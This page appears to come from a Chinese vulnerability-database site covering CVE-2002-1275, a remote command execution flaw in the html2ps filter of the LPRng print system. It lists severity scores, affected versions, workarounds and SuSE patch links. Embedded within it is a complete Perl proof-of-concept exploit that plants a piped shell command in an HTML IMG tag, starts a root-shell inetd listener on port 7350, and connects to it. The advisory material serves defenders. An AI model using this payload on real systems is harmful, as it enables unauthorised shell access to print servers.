CVE-2002-1275
CVSS7.5
发布时间 :2002-11-12 00:00:00
修订时间 :2012-10-11 00:00:00
NMCOES    

[原文]Unknown vulnerability in html2ps HTML/PostScript converter 1.0, when used within LPRng, allows remote attackers to execute arbitrary code via "unsanitized input."


[CNNVD]LPRNG html2ps远程命令执行漏洞(CNNVD-200211-019)

        
        LPRng是一款增强的、扩展的、移植的Berkeley LPR打印作业系统实现,可使用在多种操作系统下。
        LPRng中包含的html2ps过滤器存在问题,远程攻击者可以利用这个漏洞以'lp'用户权限在系统上执行任意命令。
        html2ps过滤器默认作为LPRng打印系统的一部分安装,存在未知漏洞允许远程攻击者以'lp'用户权限在系统上执行任意命令。
        目前我们还不清楚漏洞详细细节。
        <*链接:http://www.suse.com/de/security/2002_040_lprng_html2ps.html
        *>

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:html2ps_project:html2ps:1.0:b3
cpe:/a:html2ps_project:html2ps:1.0:b2
cpe:/a:html2ps_project:html2ps:1.0:b1
cpe:/a:html2ps_project:html2ps:1.0:b4
cpe:/a:html2ps_project:html2ps:1.0:b6
cpe:/a:html2ps_project:html2ps:1.0:b7
cpe:/a:html2ps_project:html2ps:1.0:b5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1275
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1275
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200211-019
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2002/dsa-192
(VENDOR_ADVISORY)  DEBIAN  DSA-192
http://www.securityfocus.com/bid/6079
(UNKNOWN)  BID  6079
http://www.novell.com/linux/security/advisories/2002_040_lprng_html2ps.html
(UNKNOWN)  SUSE  SuSE-SA:2002:040
http://www.iss.net/security_center/static/10526.php
(VENDOR_ADVISORY)  XF  lprng-html2ps-command-execution(10526)

- 漏洞信息

LPRNG html2ps远程命令执行漏洞
高危 输入验证
2002-11-12 00:00:00 2005-10-20 00:00:00
远程  
        
        LPRng是一款增强的、扩展的、移植的Berkeley LPR打印作业系统实现,可使用在多种操作系统下。
        LPRng中包含的html2ps过滤器存在问题,远程攻击者可以利用这个漏洞以'lp'用户权限在系统上执行任意命令。
        html2ps过滤器默认作为LPRng打印系统的一部分安装,存在未知漏洞允许远程攻击者以'lp'用户权限在系统上执行任意命令。
        目前我们还不清楚漏洞详细细节。
        <*链接:http://www.suse.com/de/security/2002_040_lprng_html2ps.html
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * SUSE建议用户反安装html2ps包。
        * 在/etc/lpd.perms文件中正确设置访问控制规则,在文件中增加:
        DEFAULT REJECT
        拒绝任意外部网络用户的访问。
        厂商补丁:
        S.u.S.E.
        --------
        S.u.S.E.已经为此发布了一个安全公告(SuSE-SA:2002:040)以及相应补丁:
        SuSE-SA:2002:040:lprng, html2ps: local privilege escalation, remote command execution
        链接:
        http://www.suse.com/de/security/2002_040_lprng_html2ps.html

        补丁下载:
        i386 Intel Platform:
        SuSE-8.1
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/html2ps-1.0b3-458.i586.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/html2ps-1.0b3-458.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/lpdfilter-0.43-63.i586.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/lpdfilter-0.43-63.src.rpm
        SuSE-8.0
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra1/html2ps-1.0b3-456.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/html2ps-1.0b3-456.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap1/lpdfilter-0.42-155.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/lpdfilter-0.42-155.src.rpm
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/gra1/html2ps-1.0b3-457.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/html2ps-1.0b3-457.src.rpm
        SuSE-7.2
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/gra1/html2ps-1.0b1-432.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/html2ps-1.0b1-432.src.rpm
        SuSE-7.1
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/gra1/html2ps-1.0b1-431.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/html2ps-1.0b1-431.src.rpm
        SuSE-7.0
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/gra1/html2ps-1.0b1-428.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/html2ps-1.0b1-428.src.rpm
        Sparc Platform:
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/gra1/html2ps-1.0b3-88.sparc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/html2ps-1.0b3-88.src.rpm
        AXP Alpha Platform:
        SuSE-7.0
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/gra1/html2ps-1.0b1-328.alpha.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/html2ps-1.0b1-328.src.rpm
        PPC Power PC Platform:
        SuSE-7.1
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/gra1/html2ps-1.0b1-303.ppc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/html2ps-1.0b1-303.src.rpm
        SuSE-7.0
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/gra1/html2ps-1.0b1-302.ppc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/html2ps-1.0b1-302.src.rpm
        补丁安装方法:
        用"rpm -Fhv file.rpm"命令安装文件,完成后,如果rsync服务是用inetd启动的,向inetd进程发送信号重启之。如果rsync是用"rsync --daemon"命令启动的,则再用此命令重启rsync服务。

- 漏洞信息 (21974)

LPRNG html2ps 1.0 Remote Command Execution Vulnerability (EDBID:21974)
unix remote
2002-10-31 Verified
0 Sebastian Krahmer
N/A [点击下载]
source: http://www.securityfocus.com/bid/6079/info

A vulnerability has been discovered in the html2ps filter which is included in the lprng print system.

It has been reported that it is possible for a remote attacker to execute arbitrary commands. The attacker must reportedly already have access to the 'lp' (or equivalent) account to exploit this condition.

This cause of this vulnerability is that html2ps may open files using unsanitized input that may be supplied by a potentially malicious user. 

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain apropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls printfilters as any
# other print-spooloing systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)


sub usage
{
	print "\n$0 <printhost> <remote-host>\n".
	      "\tprinthost   -- name of printer in /etc/printcap\n".
	      "\tremote-host -- IP or hostname of host where shell appears\n".
	      "'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
	exit;
}


my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O<<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

if (fork() == 0) {
	exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);



		

- 漏洞信息

3813
IRIX html2ps Arbitrary Code Execution
Loss of Integrity

- 漏洞描述

IRIX contains a flaw that may allow a malicious user to run commands as the lp user. The issue is triggered when unsanitized input is passed to html2ps. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-01-30 2004-01-30
Unknow Unknow

- 解决方案

Currently, there are no known workarounds to correct this issue. However, SGI has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LPRNG html2ps Remote Command Execution Vulnerability
Input Validation Error 6079
Yes Yes
2002-10-31 12:00:00 2009-07-11 06:06:00
Vulnerability announced in a SuSE advisory.

- 受影响的程序版本

SGI IRIX 6.5.22
SGI IRIX 6.5.21 m
SGI IRIX 6.5.21 f
SGI IRIX 6.5.20 m
SGI IRIX 6.5.20 f
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
S.u.S.E. Linux 7.3
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.0
html2ps html2ps 1.0 b3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.3
html2ps html2ps 1.0 b2
html2ps html2ps 1.0 B1
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 7.0

- 漏洞讨论

A vulnerability has been discovered in the html2ps filter which is included in the lprng print system.

It has been reported that it is possible for a remote attacker to execute arbitrary commands. The attacker must reportedly already have access to the 'lp' (or equivalent) account to exploit this condition.

This cause of this vulnerability is that html2ps may open files using unsanitized input that may be supplied by a potentially malicious user.

- 漏洞利用

Exploit code has been published:

- 解决方案

SGI has released advisory 20040104-01-P to address this issue. Patch 5424 will be released for IRIX versions later than 6.5.17. Users should upgrade to one of these versions and then apply the patch when it is available. Further details can be found in the attached advisory.

Fixes are available:


html2ps html2ps 1.0 b3

html2ps html2ps 1.0 B1

S.u.S.E. Linux 7.0

S.u.S.E. Linux 7.1

S.u.S.E. Linux 7.2

S.u.S.E. Linux 7.3

S.u.S.E. Linux 8.0

S.u.S.E. Linux 8.1

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站